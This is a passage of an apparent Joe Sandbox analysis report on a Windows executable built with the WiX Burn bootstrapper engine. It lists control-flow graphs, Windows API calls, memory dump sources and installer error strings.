92cf9d-92cfad call 973f70 832->847 835 92cf45 833->835 836 92cf3a-92cf43 833->836 840 92cf47 835->840 841 92cf4c-92cf6f call 911225 835->841 836->835 838->839 839->811 840->841 841->838 846->831 851 92cfc3-92cfd4 SetFilePointerEx 847->851 852 92cfaf-92cfc1 847->852 853 92cfd6-92cfe0 GetLastError 851->853 854 92d01c-92d02c call 973f70 851->854 852->831 855 92cfe2-92cfeb 853->855 856 92cfed 853->856 854->811 862 92d02e-92d03b 854->862 855->856 858 92cff4-92d012 call 911225 856->858 859 92cfef 856->859 858->854 859->858 862->831
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0092CDBB
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092CDC8
                                                                                                                                                                    • Part of subcall function 00972B2E: ReadFile.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00972BBF
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,0097E818,00000000,00000000,00000000,?,00000000,0097E860,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0092CEA1
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092CEAB
                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,00000000,0097E860,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0092D04E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                                                                  • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$d:\a\wix4\wix4\src\burn\engine\cache.cpp$msi.dll
                                                                                                                                                                  • API String ID: 3456208997-2912061104
                                                                                                                                                                  • Opcode ID: 0d248d9831d148c7bd4a321483178e96a60b016e943c6cbad9b4cf7c0476f1a8
                                                                                                                                                                  • Instruction ID: f05c6f675545daa99d13d7b56231ca03fbf1c7befc8b70dc0fc8d6c57d87e686
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d248d9831d148c7bd4a321483178e96a60b016e943c6cbad9b4cf7c0476f1a8
                                                                                                                                                                  • Instruction Fuzzy Hash: 537106B3B8173677E73166659C0AFBF696CAB88B50F064115BF04BA2D1E6A4DC0087F1

                                                                                                                                                                   Control-flow Graph
                                                                                                                                                                   control_flow_graph 864 9183d7-91841e EnterCriticalSection call 912680 867 918420-91842d 864->867 868 918444-918459 call 9129c8 864->868 869 918432-91843f call 911228 867->869 874 91845f-918471 868->874 875 91866e-91867c call 957b40 868->875 877 918a0e-918a1c LeaveCriticalSection 869->877 874->869 881 918473-918487 call 957b40 875->881 882 918682-91869f call 91b957 875->882 879 918a57-918a5c 877->879 880 918a1e-918a24 877->880 883 918a64-918a68 879->883 884 918a5e-918a5f call 97c1db 879->884 885 918a51-918a52 call 9155c9 880->885 886 918a26 880->886 910 9187bb-9187d8 call 91b957 881->910 911 91848d-918497 881->911 908 9187f1-9187f5 call 97c1fc 882->908 909 9186a5-9186b7 882->909 891 918a88-918a9b call 913886 * 3 883->891 892 918a6a-918a6e 883->892 884->883 893 918a28-918a2c 886->893 904 918aa0-918aa6 891->904 899 918a70-918a73 call 91367f 892->899 900 918a78-918a7c 892->900 894 918a3e-918a41 call 913886 893->894 895 918a2e-918a32 893->895 903 918a46-918a49 894->903 902 918a34-918a3c call 91367f 895->902 895->903 899->900 900->904 905 918a7e-918a86 call 91367f 900->905 902->903 903->893 916 918a4b-918a4e 903->916 905->904 924 9187fa-9187ff 908->924 910->908 929 9187da-9187e7 910->929 918 9184e5-9184e7 911->918 919 918499-9184bb call 91b957 911->919 916->885 925 918513-918534 call 91b99a 918->925 926 9184e9-91850a call 91b957 918->926 935 9184c1-9184e0 call 911228 919->935 936 918668-91866b 919->936 930 918801-918829 call 911225 924->930 931 918833-918840 call 97c20c 924->931 946 9187a4-9187b1 925->946 947 91853a-91854c 925->947 943 918510 926->943 944 9186bc-9186c9 926->944 929->908 930->931 949 918842 931->949 950 918885-91888c 931->950 954 918a0b 935->954 936->875 943->925 957 9186d3-9186fb call 911225 944->957 946->910 951 918563-91856f call 91540b 947->951 952 91854e-918556 call 9156c2 947->952 958 918844-918846 949->958 959 918848-91884b 949->959 955 9188b2-9188cd call 97c21c 950->955 956 91888e-918897 950->956 972 918772-91879f call 911225 951->972 973 918575-918579 951->973 952->957 969 91855c-918561 952->969 954->877 976 918947-91894b 955->976 977 9188cf-9188d1 955->977 965 918899-9188a8 call 97c20c 956->965 966 9188ac-9188b0 956->966 983 918700 957->983 962 918851-918856 958->962 959->962 970 918860-918872 call 911225 962->970 971 918858-91885d 962->971 991 9188d9 965->991 992 9188aa 965->992 966->955 966->956 969->973 997 918877-91887f 970->997 971->970 972->983 979 9185a1-9185b7 call 91b4f2 973->979 980 91857b-918582 973->980 985 918951-91896a call 91b938 976->985 986 9189ff-918a04 976->986 977->976 984 9188d3 977->984 1007 91874b-91876d call 911228 979->1007 1008 9185bd-9185c5 979->1008 980->979 988 918584-91859f call 91b99a 980->988 993 918706-918713 983->993 994 918913-918916 984->994 995 9188d5-9188d7 984->995 1010 918983-91899a call 97c21c 985->1010 1011 91896c-918979 985->1011 986->954 1001 918a06-918a09 986->1001 1015 91861f-918621 988->1015 998 9188db-9188dd 991->998 999 9188df-9188e2 991->999 992->966 1009 91871d-91872a 993->1009 1003 91891c-918921 994->1003 995->1003 997->950 1005 9188e8-9188ed 998->1005 999->1005 1001->954 1018 918923-918928 1003->1018 1019 91892b-918942 call 911225 1003->1019 1013 9188f7-91890e call 911225 1005->1013 1014 9188ef-9188f4 1005->1014 1007->954 1016 9185c7 1008->1016 1017 9185c9-9185cd 1008->1017 1026 918734-918741 1009->1026 1036 9189d2-9189e6 call 91b99a 1010->1036 1037 91899c 1010->1037 1011->1010 1013->997 1014->1013 1015->1026 1027 918627-918645 call 91b979 1015->1027 1016->1017 1020 9185e9-918607 call 918b6f 1017->1020 1021 9185cf-9185d1 1017->1021 1018->1019 1019->997 1041 918609-918612 call 913089 1020->1041 1042 91861c 1020->1042 1021->1020 1028 9185d3-9185e7 call 912eaf 1021->1028 1026->1007 1027->1009 1045 91864b-918662 call 91b957 1027->1045 1047 918617-918619 1028->1047 1036->986 1054 9189e8-9189f5 1036->1054 1043 9189ac 1037->1043 1044 91899e-9189aa 1037->1044 1041->1047 1042->1015 1050 9189b6-9189c8 call 911225 1043->1050 1051 9189ae-9189b3 1043->1051 1044->1043 1045->936 1045->993 1047->1042 1050->1036 1051->1050 1054->986
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,0092A80F,?,?,00000001,00000000,00000008,?,00000000,00000000,?,?), ref: 009183FF
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,?,0097E908,00000000,00000000,00000000,00000008,00000000,00000000,00000008,?,00000000,00000008,?,?), ref: 00918A11
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to length of format string.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-2252141963
                                                                                                                                                                  • Opcode ID: 07a3185985e3683ee08ec61b84be65e6b0604fb39684062e80be4533f320c377
                                                                                                                                                                  • Instruction ID: f3929ef46a640e4403875c4a91146008e3b83564bd3b11508bd530f109e3a843
                                                                                                                                                                  • Opcode Fuzzy Hash: 07a3185985e3683ee08ec61b84be65e6b0604fb39684062e80be4533f320c377
                                                                                                                                                                  • Instruction Fuzzy Hash: B912C671F4121DBBDB11DF948C45FEF7AB8EB44B50F11415ABA01FB280DA749E81ABA0

                                                                                                                                                                   Control-flow Graph
                                                                                                                                                                   control_flow_graph 1112 9174ee-917544 call 92a5be 1115 917546-917553 1112->1115 1116 91756a-917579 call 914456 1112->1116 1117 917558-917565 call 911228 1115->1117 1122 91757b-91758d 1116->1122 1123 91758f-91759d call 92e49c 1116->1123 1124 9176b8-9176c3 IsWindow 1117->1124 1122->1117 1131 9175a6-9175af call 92e4a9 1123->1131 1132 91759f-9175a4 1123->1132 1126 9176c5-9176ce PostMessageW 1124->1126 1127 9176d4-9176d8 1124->1127 1126->1127 1129 9176e7-9176ed 1127->1129 1130 9176da-9176e3 CloseHandle 1127->1130 1133 9176fb-9176fe 1129->1133 1134 9176ef-9176f8 CloseHandle 1129->1134 1130->1129 1137 9175b4-9175b8 1131->1137 1136 9175d4-9175ec call 93347d 1132->1136 1138 917700-917709 CloseHandle 1133->1138 1139 91770c-91770e 1133->1139 1134->1133 1147 917612-91762b call 912b11 1136->1147 1148 9175ee-9175fb 1136->1148 1141 9175ba-9175cc 1137->1141 1142 9175ce-9175d1 1137->1142 1138->1139 1143 917710-917711 CloseHandle 1139->1143 1144 917717-91772b call 913886 * 2 1139->1144 1141->1117 1142->1136 1143->1144 1160 917735-917739 1144->1160 1161 91772d-917730 call 91367f 1144->1161 1157 917641-91765d call 9337dc 1147->1157 1158 91762d-91763f 1147->1158 1150 917600-91760d call 911228 1148->1150 1162 9176b5 1150->1162 1167 917676-91768a call 96bf20 1157->1167 1168 91765f-917674 1157->1168 1158->1150 1165 917743-917749 1160->1165 1166 91773b-91773e call 91367f 1160->1166 1161->1160 1162->1124 1166->1165 1172 91768f-917693 1167->1172 1170 9176a8-9176b2 call 911228 1168->1170 1170->1162 1172->1162 1174 917695-9176a3 1172->1174 1174->1170
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(0097E7C0), ref: 009176BB
                                                                                                                                                                  • PostMessageW.USER32(0097E7C0,00000010,00000000,00000000), ref: 009176CE
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009176DD
                                                                                                                                                                  • CloseHandle.KERNEL32(00917EA1), ref: 009176F2
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00917703
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00917711
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917558, 00917600, 009176A8
                                                                                                                                                                  • Failed to wait for clean room process: %ls, xrefs: 00917696
                                                                                                                                                                  • msasn1.dll, xrefs: 0091752C
                                                                                                                                                                  • version.dll, xrefs: 00917649
                                                                                                                                                                  • Failed to create clean room command-line., xrefs: 009175EE
                                                                                                                                                                  • Failed to open clean room log., xrefs: 00917546
                                                                                                                                                                  • Failed to get path for current process., xrefs: 0091757B
                                                                                                                                                                  • Failed to cache to clean room., xrefs: 009175BA
                                                                                                                                                                  • "%ls" %ls, xrefs: 00917619
                                                                                                                                                                  • Failed to launch clean room process: %ls, xrefs: 00917662
                                                                                                                                                                  • Failed to allocate full command-line., xrefs: 0091762D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$MessagePostWindow
                                                                                                                                                                  • String ID: "%ls" %ls$Failed to allocate full command-line.$Failed to cache to clean room.$Failed to create clean room command-line.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to open clean room log.$Failed to wait for clean room process: %ls$d:\a\wix4\wix4\src\burn\engine\engine.cpp$msasn1.dll$version.dll
                                                                                                                                                                  • API String ID: 2982985107-3522039553
                                                                                                                                                                  • Opcode ID: de6a23869c9524b1e73529824d7c1e2e5d55d58ebefd09b08f44ca8649fd281d
                                                                                                                                                                  • Instruction ID: 39945ec77e44f5548c04f292b3cd6b66de696638132725ca21962f1e8f866457
                                                                                                                                                                  • Opcode Fuzzy Hash: de6a23869c9524b1e73529824d7c1e2e5d55d58ebefd09b08f44ca8649fd281d
                                                                                                                                                                  • Instruction Fuzzy Hash: DA61B672F4461EBBDB129BE4CC46FEEBB78AF48754F100115F614B62D0D7B09A808BA5

Control-flow Graph
APIs
  • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
  • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
• GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0096A5AD
• GetProcAddress.KERNEL32(SystemFunction041), ref: 0096A5C3
• GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0096A624
• GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0096A63C
• GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0096A682
• GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0096A69A
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressProc$ErrorLast$LibraryLoad
• String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$Failed to load Crypt32.dll$Failed to load a decryption method$Failed to load an encryption method$SystemFunction040$SystemFunction041$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
• API String ID: 1969025732-402918305
• Opcode ID: e3ea9dc7f74513c25c124a2c5e0e7e3114f3b33f898dbd4a5c3fe7f28d317a29
• Instruction ID: 80f95ebecf30492919ea30ad05c8986680c7933ff98791f38f4417cdb78f1769
• Opcode Fuzzy Hash: e3ea9dc7f74513c25c124a2c5e0e7e3114f3b33f898dbd4a5c3fe7f28d317a29
• Instruction Fuzzy Hash: 00312B32A9A321B7D33117149C0EB5639D8AB5AB98F054111F90ABA5F1F7B49C40EFE1

Control-flow Graph
APIs
• CoInitializeEx.OLE32(00000000,00000000), ref: 0093E825
• CoUninitialize.COMBASE ref: 0093EACD
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: InitializeUninitialize
• String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
• API String ID: 3442037557-242603754
• Opcode ID: 80bf4dc3dda0fbaa0f262b38c9e4714fbc1690f3637b9b332bd89f5cc892b00a
• Instruction ID: 833fdf477d33a5afa51bb4468fc31f27a19c1326a40b6a949fb152281a44348e
• Opcode Fuzzy Hash: 80bf4dc3dda0fbaa0f262b38c9e4714fbc1690f3637b9b332bd89f5cc892b00a
• Instruction Fuzzy Hash: 5261877BE98226B7EB2096588C46FBB615CABC4B20F260625FD01FF3C0D1689C405FD6

Control-flow Graph
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0091EE16,00917D9B,?,?,00917DDB), ref: 0091EC20
• GetLastError.KERNEL32(?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091EC31
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?), ref: 0091EC85
• GetCurrentProcess.KERNEL32(000000FF,00000000,?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091EC8F
• DuplicateHandle.KERNELBASE(00000000,?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091EC96
• GetLastError.KERNEL32(?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091ECA0
• SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091ECF1
• GetLastError.KERNEL32(?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091ECFB
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
• String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$crypt32.dll$d:\a\wix4\wix4\src\burn\engine\container.cpp$feclient.dll
• API String ID: 2619879409-2007315626
• Opcode ID: 604a9ef2f9289f14e6a21c79bed3248a2e68b54832f370dd42e9db5e337ba7f7
• Instruction ID: efacc6e47b6f85f7abf25057491f39379d279b508b162bc1470682b1681f3141
• Opcode Fuzzy Hash: 604a9ef2f9289f14e6a21c79bed3248a2e68b54832f370dd42e9db5e337ba7f7
• Instruction Fuzzy Hash: F341E276B4062ABBD7219F18DC49FABBA6CEF08B60F014215FD54AB2C1D361DC9097E0
APIs
• GetLocalTime.KERNEL32(00000000,00000000,00000001,0000000C,00000000,?,00000000,00000000,0000000C,00000000,00000000,00000000,00000000,00988FA8,?,00000000), ref: 00913FF5
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00914064
• GetLastError.KERNEL32 ref: 00914071
• Sleep.KERNEL32(00000064), ref: 00914085
• CloseHandle.KERNEL32(00000000), ref: 0091412A
Strings
• Failed to copy temp path to return., xrefs: 009140E9
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 00913F3B, 00913FC7, 00914117
• Failed to combine directory and log prefix., xrefs: 00913F2C
• Failed to ensure temp file path exists: %ls, xrefs: 00913FB8
• Failed to create temp file: %ls, xrefs: 009140BD
• %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00914037
• Failed to get temp folder., xrefs: 00913F5D
• failed to allocate memory for the temp path, xrefs: 00914108
• Failed to concatenate the temp folder and log prefix., xrefs: 00913F85
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLastLocalSleepTime
• String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$Failed to combine directory and log prefix.$Failed to concatenate the temp folder and log prefix.$Failed to copy temp path to return.$Failed to create temp file: %ls$Failed to ensure temp file path exists: %ls$Failed to get temp folder.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp$failed to allocate memory for the temp path
• API String ID: 1968021109-1379701186
• Opcode ID: 99006ec0e77cd2d9b2f5e30d9297ffd2c685dc89afc88c2eb1ecc7409dc9cb25
• Instruction ID: 0de33241394a6e4dcdb58488db9201d595e9c05cd4969dcafa690aaa6ac08cb7
• Opcode Fuzzy Hash: 99006ec0e77cd2d9b2f5e30d9297ffd2c685dc89afc88c2eb1ecc7409dc9cb25
• Instruction Fuzzy Hash: 45817472F4021DBBEB219B95CC46FEEBAB8AB5CB10F114115FA14B62D0D6749D81CBA0
APIs
• EnterCriticalSection.KERNEL32(009AD4F0,00000000,00000000,00000001,0000000C,0000000C,?,0092A885,00000000,00000001,00988FA8,?,00000000,00000000,0000000C,00000000), ref: 0096B0F7
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(009AD4F0,?,0092A885,00000000,00000001,00988FA8,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 0096B2F9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to combine the log path.$Failed to copy log path.$Failed to create log based on current system time.$Failed to ensure log file directory exists: %ls$Failed to expand the log path.$Failed to get log directory.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to create log file: %ls
                                                                                                                                                                  • API String ID: 3168844106-925379867
                                                                                                                                                                  • Opcode ID: de67c70b092e7da9bdbae77d752f763a0144a7da3e7556a0eba3ad07e9095b3b
                                                                                                                                                                  • Instruction ID: 10eea82c0c5ab9ddb456c6feb76fa5270cf0e0b10ec01ab75c26ffab7056a091
                                                                                                                                                                  • Opcode Fuzzy Hash: de67c70b092e7da9bdbae77d752f763a0144a7da3e7556a0eba3ad07e9095b3b
                                                                                                                                                                  • Instruction Fuzzy Hash: CC51D571B85318BBDB215B64CC56FEF3AECAF9AB54F010110F915FA1E1EB709D809A90
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,?,00000000,?,?,0091ED4D,?,00000000,?,0091EE16), ref: 0093EEC9
                                                                                                                                                                  • GetLastError.KERNEL32(?,0091ED4D,?,00000000,?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0093EED6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                                                  • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp$wininet.dll
                                                                                                                                                                  • API String ID: 545576003-3725142438
                                                                                                                                                                  • Opcode ID: 02422355ed227ee79068717d0556ed36ad6b73649fb66143990a2cbb37019cd0
                                                                                                                                                                  • Instruction ID: 2e08e77fb8cd131c0e9bd589c9a2b30650ee9fd6f26721aa344c03052c0db077
                                                                                                                                                                  • Opcode Fuzzy Hash: 02422355ed227ee79068717d0556ed36ad6b73649fb66143990a2cbb37019cd0
                                                                                                                                                                  • Instruction Fuzzy Hash: AE310673A8173A77E73153284C4AFBB695CEB44BA4F024621BE44BB2C1E6A4DC404AF4
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00917D5B,00000000,00917DDB,?,?,0091B898,00000002,?,8D4BE800,00000000), ref: 0091A0E6
                                                                                                                                                                    • Part of subcall function 00918306: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,00919840,00919840,?,00918154,?,?,00000000), ref: 00918342
